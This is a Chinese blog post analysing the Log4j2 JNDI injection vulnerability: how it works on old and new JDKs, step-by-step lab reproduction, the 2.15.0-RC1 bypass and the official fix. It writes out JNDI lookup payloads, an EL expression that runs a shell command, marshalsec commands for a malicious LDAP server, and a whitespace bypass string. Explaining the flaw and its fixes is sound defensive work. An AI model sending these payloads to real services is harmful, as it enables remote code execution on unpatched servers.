ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Log4j2注入漏洞万字剖析-汇总收藏版(攻击步骤、漏洞原理、2.15.0-RC1绕过原理以及2.15.0修复原理)

2021-12-16 10:34:53  阅读:721  来源: 互联网

标签:Java 攻击 Codebase 漏洞 Ldap 原理 2.15 Log4j2


一、前言

上周五(12月10日)应该是全世界程序员都不得安宁的一天。楼主早上一到公司就收到安全部分通知Log4j2出现严重安全漏洞,攻击者可以利用该漏洞在服务器上执行任意指令,从而操控服务器。于是一整天我们整个团队都在忙于修复Log4j2漏洞。从最开始修改JVM参数,到后来的2.15.0-RC1版本,再到最后的2.15.0发布版,简直是一波三折啊。当时我们还在和同事开玩笑,“今天全世界程序员都要加班了”。

漏洞修复完成后,作为一个程序对代码起码的尊重,楼主便开始通过各种途径查找本次漏洞相关各类资料,打算对漏洞做一个全面分析了解。抱着”知其然,且知其所以然“精神。于是楼主带着如下问题,开始了查找之旅。

1、Log4j2漏洞复现步骤(攻击步骤)

2、Log4j2漏洞的原理(为什么存在)

3、Log4j2漏洞中2.15.0-RC1版本为什么会被绕过

4、Log4j2最终修复方案(2.15.0)的原理是什么

通过大量的网络查找,楼主才终于弄清楚了上面的所有问题,同时也对本次漏洞有了深入的分析和理解。在这个过程中楼主发现一个问题,网上基本没有一篇文章能够把本次漏洞讲得清楚彻底。甚至网上通用的的复现步骤,在现在的Java主流版本中,根本就无法复现。因为该漏洞在java高版本和低版本下需要不同的攻击方式,才能达到攻击的目的。

于是楼主决定编写本文来和大家一起对该漏洞进行全面深入的剖析。本文将从如下基本方面进行讲解。

1、Log4j2漏洞的基本原理

2、Log4j2漏洞在Java高低版本中的攻击原理

3、Log4j2漏洞在Java高低版本中的攻击步骤

4、Log4j2漏洞在2.15.0-RC1中被绕过的原因

5、Log4j2最终修复方案(2.15.0)的原理

其实这个漏洞在11月底就被发现了,且Log4j2官方在12月5号就已经在开始修复该漏洞。

二、Log4j2漏洞原理

1、基础知识

A、什么是JNDI

JNDI全称 Java Naming and Directory Interface。JNDI是Java平台的一个标准扩展,提供了一组接口、类和关于命名空间的概念。如同其它很多Java技术一样,JDNI是provider-based的技术,暴露了一个API和一个服务供应接口(SPI)。这意味着任何基于名字的技术都能通过JNDI而提供服务,只要JNDI支持这项技术。JNDI目前所支持的技术包括LDAP、CORBA Common Object Service(COS)名字服务、RMI、NDS、DNS、Windows注册表等等。很多J2EE技术,包括EJB都依靠JNDI来组织和定位实体。
JDNI通过绑定的概念将对象和名称联系起来。在一个文件系统中,文件名被绑定给文件。在DNS中,一个IP地址绑定一个URL。在目录服务中,一个对象名被绑定给一个对象实体。
JNDI中的一组绑定作为上下文来引用。每个上下文暴露的一组操作是一致的。例如,每个上下文提供了一个查找操作,返回指定名字的相应对象。每个上下文都提供了绑定和撤除绑定名字到某个对象的操作。JNDI使用通用的方式来暴露命名空间,即使用分层上下文以及使用相同命名语法的子上下文。

 参考:JNDI是什么_百度知道

简单来说:通过JNDI提供了"通过名称找到对应的对象"的规范定义,即SPI功能,实现则由具体的技术支持,如:LDAP,RMI,DNS,Database。比如在JNDI支持的数据源中,如下图(具体请参考:JNDI学习总结(一)——JNDI数据源的配置 - 孤傲苍狼 - 博客园),我们可以通过”jdbc/oracle“获取到Oracle对应的数据库连接池对象,并直接用于操作数据库即可。

B、什么是LDAP

目录服务是一个特殊的数据库,用来保存描述性的、基于属性的详细信息,支持过滤功能。

LDAP(Light Directory Access Portocol),它是基于X.500标准的轻量级目录访问协议。

目录是一个为查询、浏览和搜索而优化的数据库,它成树状结构组织数据,类似文件目录一样。

目录数据库和关系数据库不同,它有优异的读性能,但写性能差,并且没有事务处理、回滚等复杂功能,不适于存储修改频繁的数据。所以目录天生是用来查询的,就好象它的名字一样。

LDAP目录服务是由目录数据库和一套访问协议组成的系统。

参考:LDAP概念和原理介绍 - WilburXu - 博客园

简单来说:LDAP是一个目录服务,可以通过目录路径查询到对应目录下的对象(文件)等。即其也是JNDI的实现,通过名称(目录路径)查询到对象(目录下的文件)。

C、什么是Codebase

Codebase就是存储代码或者编译文件的服务。其可以根据名称返回对应的代码或者编译文件,如果根据类名,提供类对应的Class文件。

参考:PSA: Log4Shell and the current state of JNDI injection – – Random ramblings, exploits and projects.

2、Java低版本原理(网上普遍攻击原理)

A、原理概述

Log4j2漏洞总的来说就是:因为Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议即可),并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:9999/Test}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。

B、恶意代码编写

我们一直在提到恶意的Class文件,那么恶意类的Java代码是怎样的呢?写个main函数?(给大家10秒钟时间想想)

如果大家初步理解了上面的原理概述就知道,直接写main函数不行,因为整个过程中Java并没有执行Class文件中的任何方法,只是使用累加器加载和实例化了该类而已。所以我们需要让代码在实例化的就会被执行。因此我们这类采用了静态块。其代码如下:

该模拟攻击代码比较简单,只是在mac电脑上打开文件管理器。

C、攻击流程与原理

接下来咱们一起分析下具体原理,整个攻击原理和流程如下图所示。

PS:由于源码涉及比较多,所以本文不会详细降解源码,只会大致梳理下关键调用链。其源码本身也比较简单,有兴趣的同学自己Debug跟一下,就能清楚的理解整个源码逻辑。

1、首先攻击者遭到存在风险的接口(接口会将前端输入直接通过日志打印出来),然后向该接口发送攻击内容:${jndi:ldap://localhost:9999/Test}。

2、被攻击服务器接收到该内容后,通过Logj42工具将其作为日志打印。

源码:org.apache.logging.slf4j.Log4jLogger.debug(...)/info(...)/error(...)等方法

            > org.apache.logging.log4j.core.config.LoggerConfig.log(...)

                  > AbstractOutputStreamAppender.append(final LogEvent event)

3、此时Log4j2会解析${},读取出其中的内容。判断其为Ldap实现的JNDI。于是调用Java底层的Lookup方法,尝试完成Ldap的Lookup操作。

源码:StrSubstitutor.substitute(...) --解析出${}中的内容:jndi:ldap://localhost:9999/Test

                > StrSubstitutor.resolveVariable(...) --处理解析出的内容,执行lookup

                > Interpolator.lookup(...) --根据jndi找到jndi的处理类

                        > JndiLookup.lookup(...)

                        > JndiManager.lookup(...)

                                > java.naming.InitialContext.lookup(...) --调用Java底层的Lookup方法

PS:后续步骤都是Java内部提供的Lookup能力,和Log4j2无关。

4、请求Ldap服务器,获取到Ldap协议数据。Ldap会返回一个Codebase告诉客户端,需要从该Codebase去获取其需要的Class数据。

源码:LdapCtx.c_lookup(...) 请求并处理数据 (ldap中指定了javaCodeBase=)

                >Obj.decodeObject --解析到ldap结果,得到classFactoryLocation=http://localhost:8888

                > DirectoryManager.getObjectInstance(...) --请求Codebase得到对应类的结果

                        > NamingManager.getObjectFactoryFromReference(...) --请求Codebase

5、请求Ldap中返回的Codebase路径,去Codebase下载对应的Class文件,并通过类加载器将其加载为Class类,然后调用其默认构造函数将该Class类实例化成一个对象。

源码:VersionHelper12.loadClass(...) --请求Codebase得到Class并用类加载器加载

                > NamingManager.getObjectFactoryFromReference(...) 通过默认构造函数实例化类。

这里就会导致我们攻击代码中的静态块中的内容被执行。

到此整个攻击原理就完成了。其实总体也很简单。归纳来看关键就如下几步:

1、攻击则发送带有恶意Ldap内容的字符串,让服务通过log4j2打印

2、log4j2解析到ldap内容,会调用底层Java去执行Ldap的lookup操作。

3、Java底层请求Ldap服务器(恶意服务器),得到了Codebase地址,告诉客户端去该地址获取他需要的类。

4、Java请求Codebase服务器(恶意服务器)获取到对应的类(恶意类),并在本地加载和实例化(触发恶意代码)。

PS:留个问题,因为恶意Factory类会被加载和通过默认构造函数构造,那么我们是否可以通过在默认构造函数中执行恶意代码来实现攻击,而不是在static静态块中实现?

3、JDK高版本为何无效

A、哪些版本受影响

上述所有操作都需要JDK版本低于JDK 8u191才可以实现。而JDK8u191的版本在三年前就已经发布了。所有现在主流的服务器应该都基本是JDK高版本的。所以该攻击在主流版本上无法使用。

参考:PSA: Log4Shell and the current state of JNDI injection – – Random ramblings, exploits and projects.

B、为何失效

那为什么该攻击在高版本无效呢?我们一起来看下。

其实是因为高版本在VersionHelper12.loadClass方法中加了一个判断,如下新增了”com.sun.jndi.ldap.object.trustURLCodebase“变量来控制是否允许请求Codebase下载所需的Class文件,且该变量默认为false。

所以高版本的Java的请求逻辑如下。即无法请求Codebase,整个攻击因此失效。

但是我们还是可以正常请求Ldap服务器,所以我们仍然有可能通过自己的恶意Ldap服务器构建返回恶意代码,从而实现注入攻击。接下来,我们就一起来讨论下高版本如何通过Ldap恶意服务器对服务器进行攻击。

C、手动修改trustURLCodebase实现攻击?

其实我们在模拟的时候完全可以通过System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");将其指定为true,这样我们就能够在高版本上执行攻击模拟。网上很多文章也确实是这样做的,但其基本没有解释这样做的原因。

如果是为了在高版本验证低版本的攻击步骤,那么这样做完全OK。但是对于分析Logj42漏洞原理来说,这样做就不太合适。因为分析的目的就是要知道高版本如何实现攻击。这样我们才能够找到具体的防护方法。

再者,如果你是攻击者,你该不会期望哪个服务器会主动把trustURLCodebase设置为true,等着你来攻击吧。

4、Java高版本原理

A、Lookup的基本功能

在开始分享高版本攻击原理前,我们需要先了解下Java底层Ldap的Lookup的基本功能。因为低版本攻击中,我们不太需要关注这一块,所以没有具体讲解。但高版本则需要依赖该功能达到攻击的目的。

当Java底层请求Ldap服务器后,Ldap主要返回了三个主要参数javaClassName、javaFactory、JavaFactoryLocaltion,以及一些额外参数。客户端获得这些参数之后主要做一件事情:构造需要的类实例。即客户端通过javaFactory类来构建实现我们需要的JavaClassName指定的实例。这个过程中需要注意如下几点:

1、javaFactory类需要是ObjectFactory的子类。

2、javaFactory有两个来源:来自Codebase(Ldap返回Codebase地址),或者来自本地(Ldap返回对应javaFactory的类地址)。

        对于来自Codebase的Factory:和低版本中的逻辑一样,我们需要请求Codebase获取其Class文件,然后加载该Factory类,并使用默认构造函数实例化出Factory实例。

        来自本地的Factory:则直接根据Ldap返回的路径(类限定符),通过Class.forName进行加载和实例化。

3、得到javaFactory实例后,我们需要构建通过javaFactory实例构建出JavaClassName指定的对象。

4、Log4j2通过javaFactory得到对应的对象之后,会调用其toString方法将其转换为字符串,然后用该字符串替换日志中的${...}内容,最后打印出来

源码:DirectoryManager.getObjectInstance

B、攻击者如何利用Ldap

1、JDK低版本如何利用Ldap实现攻击

通过上面低版本的原理分析可知,我们根据在Ldap构造了javaFactoryLocation指向Codebase,告诉客户端需要从远端Codebase去获取需要的javaFactory类。获取到之后,然后使其使用本地的类加载器加载远程恶意的javaFactory类的,然后其在加载的过程中执行恶意的static代码块,从而实现攻击。

2、JDK高版本如何利用Ldap实现攻击

我们知道高版本已经无法去Codebase获取javaFactory的Class文件,所以我们想通过让客户端加载和实例化我们恶意构建的javaFactory来实现攻击是不可能的了。

但是,我们还可以走本地javaFactory这条路。即让Ldap实例化一个本地存在的javaFacotry,并用该javaFactory实例化一个本地存在的类。因此我们需要找到本地哪些javaFactory存在一些可以被利用的漏洞。

C、JDK高版本的具体攻击原理

高版本攻击原理参考:Exploiting JNDI Injections in Java | Veracode blog

参考文章中提到了tomcat携带的org.apache.naming.factory.BeanFactory类就是一个存在风险的ObjectFactory子类。通过该Factory我们可以通过默认构造函数实例化任意一个类,并调用其任意的只有一个String入参的公共方法,且其方法名可以不用是标准setter的名称,而可以是任意名称。因为我们可以通过forceString来制定某个String变量的setter方法名称。(具体逻辑大家自己看下BeanFactory.getObjectInstance的源码即可)

 基于此能力,我们就可利用javax.el.ELProcessor类,因为其有个eval方法,只有一个Stirng入参。其可以执行EL表达式,从而执行任意指令。

比如我们让其执行如下EL表达式,就能够达到让其在mac下执行”open .“指令的功能。

\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['open','.']).start()\")

所以我们只需要Ldap服务器返回JavaFactory=org.apache.naming.factory.BeanFactory,javaClassName=javax.el.ELProcessor。同时传递参数x=上述恶意代码,forceString="x=eval"。

这样客户端拿到指令之后就会做如下操作:

1、直接在本地加载和实例化BeanFactory工厂,得到BeanFacory实例

2、BeanFactory工厂通过默认构造函数实例化javax.el.ELProcessor,得到ELProcessor实例

3、Ldap告诉BeanFactory,ELProcessor有一个string类型的变量x(实际没有),其内容为恶意代码块,且该变量的setter方法名为eval。

4、BeanFactory就会执行ELProcessor实例的eval方法,且入参为恶意代码块。

至此我们就达到执行让ELProcessor通过eval执行恶意代码的目的,从而实现远程攻击。

整个攻击流程如下:

Log4j2漏洞的攻击原理就介绍到这里。接下来我们一起来实战下基于Log4j2漏洞如何实现对服务器的攻击。

PS:给大家留个小问题,上述基于ELProcessor的攻击方法,有什么限制呢?

三、Log4j2漏洞复现步骤(攻击方法)

1、基础环境说明与搭建

通过上述原理分析可知,我们主要涉及到三个系统:被攻击服务、恶意Ldap服务和恶意Codebase服务。

A、被攻击服务搭建

这个服务比较简单,只需部署一个简单的web工程,然后要引入log4j2(2.15.0以下版本)打印日志。然后编写一个简单的Controller将接口传入的参数通过日志打印出来即可。

B、恶意Ldap服务搭建

搭建Ldap服务有两个途径:自己使用ldapsdk的jar包实现一个ldap服务,或者使用现成的marshalsec实现。

这里我们选择使用现成的marshalsec实现。

首先我们从github上克隆该代码(https://github.com/mbechler/marshalsec

然后再工程根目录下执行mvn clean package -DskipTests对进行编译打包。

完成之后执行如下指令,在9999端口上启动该ldap服务:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8888/#Test 9999

开启之后会看到如下日志。

C、恶意Codebase服务搭建

这个服务比较简单,只需要在请求的时候,能够具体返回该请求对应的Class文件即可。

于是我们编写恶意代码Test.java,然后使用javac将其编译成Class文件。

然后我们在该目录执行python3 -m http.server 8888,在端口8888上基于该目录启动一个简单的http服务。当我们访问http://localhost:8888/Test.class的时候,该服务就会返回该目录下对应的Class文件。

2、Java低版本的复现步骤

现在我们开始执行恶意攻击。我们调用attack接口传入如下参数:

接着我们在Ldap的服务端可以看到如下日志,其表示其告诉客户端到Codebase去获取它需要的Class文件。

同时在Codebase的服务端可以看到如下日志。 标记了被攻击服务端来请求Test.class的记录和状态。

 然后电脑就会弹出文件管理器。至此攻击完成。

3、Java高版本的复现步骤

通过攻击原理我们知道,高版本攻击我们不依赖Codebase服务。但是我们需要Ldap服务器返回ELProcessor相关的类。所以我们需要对marshalsec源码进行修改。然后重新编译打包再启动服务。

因为咱们攻击依赖的ELProcessor和BeanFactory存在Tomcat包中。所以我们需要在marshalsec工程中引入Tomcat依赖。

 然后需要将LDAPRefServer类中的方法sendResult修改为如下内容:

然后我们通过mvn clean package -DskipTests对其进行重新编译打包。并通过java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8888/#Test 9999启动即可。(其实http://localhost:8888/#Test是Codebase地址我们没有使用,但是因为我们没有修改启动逻辑,所以仍然需要传递)

一切就绪之后,我们通过调用attack接口实现攻击了。

执行完成后,同样电脑就会弹出文件管理器。至此攻击完成。

四、Log4j2漏洞修复原理

1、修复原理(官方如何修复)

其实查看Log4j2最新提交的代码(https://github.com/apache/logging-log4j2),咱们很容易就能看到其修复方法。

官方主要通过两个途径来修复该问题:新增jndi开关(默认关闭)和新增jndi相关域名、协议和Class白名单。

A、新增Jndi开关

在JndiManager中新增了jndi开关,通过log4j2.enableJndi参数来控制。默认为false。 

同时在新建JndiManager管理类时会判断,如果开关关闭,则创建空的JndiManager类,即空的JndiManager无法执行任何JNDI操作。

 空JndiManager执行lookup方法时会直接返回null。不会执行真正的lookup逻辑。

B、新增白名单

由于Jndi功能在有些业务条件下需要使用。所以官方不能完全禁止用户使用。于是如果使用者主动开启了jndi功能,那么我们要怎么防止被攻击呢?官方使用了一个比较简单的办法,即给协议、class和域名都添加白名单。这样只要使用者合理的使用都不会有问题。

默认白名单的协议:JAVA、LDAP、LDAPS

默认白名单的域名:localhost

默认白名单支持的类:基本类型对应的对象。

 在执行lookup的时候,其会校验对应的白名单。

官方修复方案的介绍就到这里。这里我们只讲解了核心代码,具体逻辑大家可以下载Log4j2的源码,查看从5号开始的改动即可。 

PS:留个问题,为什么我们控制好了Jndi就可以解决由于Ldap导致的漏洞。

2、2.15.0-RC1版本为何会被绕过

这个版本的绕过和其实很有意思。原因是因为在JndiManager.lookup的方法中,当执行各类白名单过滤操作中,如果抛出异常。在RC1的版本中,其没有做任何处理,导致只要抛出异常就能够正常的执行后续的lookup逻辑。从而绕过了白名单检测。

于是后续做了修正,只要抛出异常就直接返回null。

那么我们可以如何绕过呢? 这里我们参考了文章安全漏洞之Log4j2漏洞复现绕过分析。通过URI中不进行URL编码会报报错URISyntaxException,在URL中添加一个空格即可触发,比如:${jndi:ldap://127.0.0.1:1389/ badClassName}。如下是对URI构造函数做空格测试的结果: 

虽然对空格做编码导致异常,但是lookup时候会去掉这个空格。所以异常之后后续的lookup也能够正常执行。

3、JVM参数formatMsgNoLookups的修复原理(不建议)

这个比较简单,就是通过JVM设置一个参数formatMsgNoLookups=true。让Log4j2在处理${}消息的时候,不执行lookup操作。

 其实这种方式也是可以解决漏洞的。但是存在一个问题:如果服务本身就需要利用Log4j2的jndi功能。配置参数后就无法使用。所以作为官方解决方案来说,该方法还是存在不妥之处。

于是官方最终采用了jdni开关+白名单的方式来解决了该问题。

至此Log4j2漏洞的深入剖析就和大家分享完了。如果你喜欢本文或觉得本文对你有所帮助,欢迎一键三连支持,非常感谢。

五、惯例

如果你喜欢本文或觉得本文对你有所帮助,欢迎一键三连支持,非常感谢。

如果你对本文有任何疑问或者高见,欢迎添加公众号lifeofcoder共同交流探讨(添加公众号可以获得楼主最新博文推送以及”Java高级架构“上10G视频和图文资料哦)。

 

标签:Java,攻击,Codebase,漏洞,Ldap,原理,2.15,Log4j2
来源: https://blog.csdn.net/hilaryfrank/article/details/121944757

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有